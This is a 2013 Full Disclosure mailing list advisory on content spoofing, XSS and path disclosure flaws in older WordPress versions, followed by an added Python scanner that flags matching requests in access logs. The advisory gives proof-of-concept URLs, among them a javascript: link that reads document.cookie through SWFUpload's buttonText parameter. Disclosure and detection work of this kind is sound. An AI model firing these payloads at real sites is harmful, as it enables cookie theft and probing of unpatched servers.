Full Disclosure mailing list archives
CS, XSS and FPD vulnerabilities in WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 9 Jul 2013 23:51:22 +0300
Hello list! These are Content Spoofing, Cross-Site Scripting and Full path disclosure vulnerabilities in WordPress.

At the WordPress 3.5.2 release (the same at the 3.5.1 release), WP developers mentioned multiple fixed holes, but not all of them - to make it look like there were fewer fixed holes. So I'm revealing this information for you.

In March I wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which is also bundled with WordPress), and I mentioned that they concerned only versions before WordPress 3.3.2 and were fixed in version 3.3.2 together with 2012's XSS hole. But I checked these holes in older versions of WP and in version 3.5.1. And as I found two weeks ago, these CS and XSS vulnerabilities were fixed exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable, and in version 3.5.1 the developers included an updated version of SWFUpload without mentioning these fixes (they like to do such things); they only mentioned the fixes in SWFUpload in WP version 3.5.2.

There are fixed vulnerabilities in WordPress 3.5.2 which are not mentioned in the announcement and codex. Like the Full path disclosure vulnerability mentioned below (which I disclosed last week), even though they have mentioned an FPD during upload.

-------------------------
Affected products:
-------------------------

For CS and XSS, vulnerable are versions WordPress 2.7 - 3.5.
For FPD, vulnerable are versions WordPress 3.4 - 3.5.1.

----------
Details:
----------

Content Spoofing (WASC-12):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Code will execute after click. It's strictly social XSS.

Full path disclosure (WASC-13):

http://site/wp-admin/users.php?s=http://

There is an FPD when the search string starts with http:// or https://.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
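As an added example (not part of MustLive's post), a small Python scanner that flags the three request patterns described above in web server access logs: markup or a javascript: URL in the swfupload.swf buttonText parameter, and a users.php search term beginning with http:// or https://. The log lines, timestamps and IP addresses are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jul/2013:23:51:22 +0300] "GET /wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E HTTP/1.1" 200 12345
203.0.113.6 - - [09/Jul/2013:23:52:01 +0300] "GET /wp-includes/js/swfupload/swfupload.swf?buttonText=Upload HTTP/1.1" 200 12345
203.0.113.7 - - [09/Jul/2013:23:53:10 +0300] "GET /wp-admin/users.php?s=http:// HTTP/1.1" 200 2048
203.0.113.8 - - [09/Jul/2013:23:54:00 +0300] "GET /wp-admin/users.php?s=alice HTTP/1.1" 200 2048
"""

# Minimal common-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify_request(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    if path.endswith("/swfupload/swfupload.swf"):
        for value in params.get("buttonText", []):
            # parse_qs decodes once; decode again so double-encoded probes are caught too.
            decoded = unquote(value)
            if re.search(r"<|javascript:", decoded, re.IGNORECASE):
                return "swfupload buttonText markup (CS/XSS probe)"
    if path.endswith("/wp-admin/users.php"):
        for value in params.get("s", []):
            if value.lower().startswith(("http://", "https://")):
                return "users.php search with URL prefix (FPD probe)"
    return None

def scan_log(text):
    """Scan log text and return (ip, target, label) tuples for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        label = classify_request(m.group("target"))
        if label:
            findings.append((m.group("ip"), m.group("target"), label))
    return findings

if __name__ == "__main__":
    for ip, target, label in scan_log(SAMPLE_LOG):
        print(f"{ip} {label}: {target}")
```

Servers already on WordPress 3.5.2 or later are not affected by these requests, so hits here mostly identify scanners probing for the old versions.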